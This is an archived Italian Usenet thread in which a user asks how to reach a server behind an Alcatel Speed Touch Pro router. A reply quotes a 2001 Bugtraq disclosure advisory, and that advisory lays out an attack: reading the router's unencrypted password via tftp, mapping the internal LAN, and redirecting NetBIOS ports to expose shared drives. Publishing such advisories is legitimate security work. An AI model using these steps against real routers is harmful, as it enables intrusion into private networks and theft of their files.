Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Router, Adsl, Lan

0 views
Skip to first unread message

Liceo Serpieri

unread,
Aug 21, 2001, 1:42:07 AM8/21/01
to
Salve a tutti.
Ho una LAN collegata ad un router ADSL, la LAN ha gli indirizzi
192.168.x.x e il router 217.y.y.y (non me lo ricordo mai cmq e'
fisso).
Da tutti i PC posso accedere a internet, ma, dato che un PC fa anche
da SERVER (linux) vorrei che dall'esterno (es. casa mia) potessi
accedere al server.
So che c'entrano NAT statici e PATda configurare sul router, ma come
c'entrino non lo so.

Qualcuno può essermi d'aiuto? Magari anche solo dove posso trovare
(qualche bel sito) informazioni in merito.

Grazie a tutti


poker

unread,
Aug 21, 2001, 4:32:55 AM8/21/01
to

"Liceo Serpieri" <serp...@XYZrimini.com> ha scritto nel messaggio
news:3b81f36...@news.tin.it...
Se ci dici che router hai forse ti possiamo aiutare!


Liceo Serpieri

unread,
Aug 21, 2001, 4:48:52 AM8/21/01
to

>Se ci dici che router hai forse ti possiamo aiutare!
>
>

Scusate: ho un Alcatel Speed Touch Pro con Firewall
Grazie

poker

unread,
Aug 21, 2001, 7:14:24 AM8/21/01
to

"Liceo Serpieri" <serp...@XYZrimini.com> ha scritto nel messaggio
news:3b822074...@news.tin.it...

>
> >Se ci dici che router hai forse ti possiamo aiutare!
> >
> >
>
> Scusate: ho un Alcatel Speed Touch Pro con Firewall
> Grazie

Guarda qui sotto e fammi sapere se ti è utile ... è ovvio che il nat statico
lo dovrai configurare SOLO per le porte tcp/ip che ti interessano
... a proposito se il router te l'hanno dato in comodato e l'hanno
"blindato" con password varie, sarà necessario che il tuo ISP ti dia la
password o ti configuri il router tramite telnet (se è telecom Ti auguro di
cuore buona fortuna perchè sarà un'Odissea).

Fammi sapere


ALCATEL Speed Touch PRO port redirect exploit

----------------------------------------------------------------------------
----

To: BUG...@SECURITYFOCUS.COM
Subject: ALCATEL Speed Touch PRO port redirect exploit
From: Stefano Chiccarelli <s.chic...@NEWTEL.IT>
Date: Tue, 24 Apr 2001 10:15:32 +0200
Approved-By: ale...@SECURITYFOCUS.COM
Delivered-To: bug...@lists.securityfocus.com
Delivered-To: BUG...@SECURITYFOCUS.COM
Reply-To: Stefano Chiccarelli <s.chic...@NEWTEL.IT>
Sender: Bugtraq List <BUG...@SECURITYFOCUS.COM>

----------------------------------------------------------------------------
----

Taking advantage from the ALCATEL Speed Touch Pro backdoor and configuration
problems, it is possible to obtain a "full priv"
access to the router and launch several attack against the internal LAN
thanks to the NAT/PAT feature often made available.

If the router is "telnetable" it means that "ip config firewalling" mode is
"off", accepting internet connections at the wan
interface's IP. Now the choice is
a - use Shimomura Tsutomu's Backdoor
b - use this commandline tftp -i IPTARGET GET active/system.ini to read the
unencrypted password.

Among other, it is possible To gain access to the computer(s) behind the
router. 90 over 100 times, you will find a Microsoft-based
LAN (especially a NETBIOS Lan) active. So the intruder can map the whole
"network status" following the menu
IP>
and then
arplist

The screen looks this way
neuro@neuroneuro$ --> telnet router
Trying 192.168.0.1...
Connected to router.
Escape character is '^]'.
User :
SpeedTouch (00-90-D0-04-47-0D)
Password :
######----------------------------------------------------------------------
--
*
* ______
* ___/_____/\
* / /\\ ALCATEL ADSL MODEM
* _____/__ / \\
* _/ /\_____/___ \ Version 3.2
* // / \ /\ \
* _______//_______/ \ / _\/______ Copyright 1999-2000.
* / / \ \ / / / /\
* __/ / \ \ / / / / _\__
* / / / \_______\/ / / / / /\
* /_/______/___________________/ /________/ /___/ \
* \ \ \ ___________ \ \ \ \ \ /
* \_\ \ / /\ \ \ \ \___\/
* \ \/ / \ \ \ \ /
* \_____/ / \ \ \________\/
* /__________/ \ \ /
* \ _____ \ /_____\/
* \ / /\ \ /
* /____/ \ \ /
* \ \ /___\/
* \____\/
*
-----------------------------------------------------------------------
=>ip
[ip]=>arplist
Intf IP-address HW-address Type
eth0 192.168.0.2 00:00:b4:59:36:6c DYNAMIC
eth0 192.168.0.3 00:c0:26:ca:25:5e DYNAMIC
[ip]=>


It is even possible to check the routing table to learn the internal LAN
addressing.
The command is
[ip]=>rtlist
Destination Source Gateway Intf Mtrc
192.168.0.0/24 192.168.0.0/24 192.168.0.1 eth0 1
192.168.0.1/32 0.0.0.0/0 192.168.0.1 eth0 0
217.59.X.XXX/32 0.0.0.0/0 217.59.X.XXX cip0 0
127.0.0.1/32 0.0.0.0/0 127.0.0.1 loop 0
217.59.X.XXX/30 0.0.0.0/0 217.59.X.XXX cip0 1
192.168.0.0/24 0.0.0.0/0 192.168.0.1 eth0 1
0.0.0.0/0 0.0.0.0/0 217.59.X.XXX cip0 1


Now, let's ping the other machines to find the "powered on" ones (for sure
the boxes showed by arplist, but it could exist some
"hidden" machine")
[ip]=>:ip ping addr=192.168.0.2 count=10 size=100 interval=100 listen=off
108 bytes from 192.168.0.2: icmp_seq=0 time=2511 us
108 bytes from 192.168.0.2: icmp_seq=1 time=2337 us
108 bytes from 192.168.0.2: icmp_seq=2 time=2393 us
108 bytes from 192.168.0.2: icmp_seq=3 time=2314 us
108 bytes from 192.168.0.2: icmp_seq=4 time=2324 us
108 bytes from 192.168.0.2: icmp_seq=5 time=2333 us
108 bytes from 192.168.0.2: icmp_seq=6 time=2453 us
108 bytes from 192.168.0.2: icmp_seq=7 time=2350 us
108 bytes from 192.168.0.2: icmp_seq=8 time=2299 us
108 bytes from 192.168.0.2: icmp_seq=9 time=2353 us

We've found that the 192.168.0.2 is on, and we can redirect the ports thanks
to the NAT/PAT features, to make so that we are
allowed to access 192.168.0.2 from the outside.

It is now possible to redirect the ports 137,138,139 TCP/UDP and map the
NetBIOS resources straight to the internet.
The command is

NAT>create protocol=tcp inside_addr=192.168.0.2:137
outside_addr=217.59.9.154:137
[repeat for all the port (either tcp or udp) you are intersted in]

After this step, the intruder can open the shared directories on the
ALCATEL-behind router LAN with private IP.

\\ipdelrouteralcatel

Sharing whole HD's on a private LAN is quite common, because people feel
protected from outside attacks.
It is obvious that it is possible to redirect ALL tcp/udp ports, toward
those services we know being "bugged".
The only limit is the fantasy.

Greetings:
:: Franko21 :: rubik :: Andrea Monti :: Metro Olografix Member ::

---------------------------------------------
Stefano "NeURo" Chiccarelli
Metro Olografix Association
ne...@olografix.org

Chief security officer for:
- Studio Legale Monti
http://www.andreamonti.net

- Nuova Newtel s.r.l.
http://www.newtel.it

65126(PESCARA,Italy)
Tel: 39+085 44825267 fax: 39+085 44825280
--------------------------------------------

----------------------------------------------------------------------------
----

Prev by Date: Re: SECURITY.NNOV: The Bat! <cr> bug
Next by Date: Re: WFTPD "Pro" 3.0 R4 Buffer Overflow
Prev by thread: Vulnerability in Viking Web Server
Next by thread: FreeBSD Security Advisory FreeBSD-SA-01:35.licq
Index(es):
Date
Thread

Liceo Serpieri

unread,
Aug 22, 2001, 4:00:02 AM8/22/01
to
Grazie funziona perfettamente!!!!
0 new messages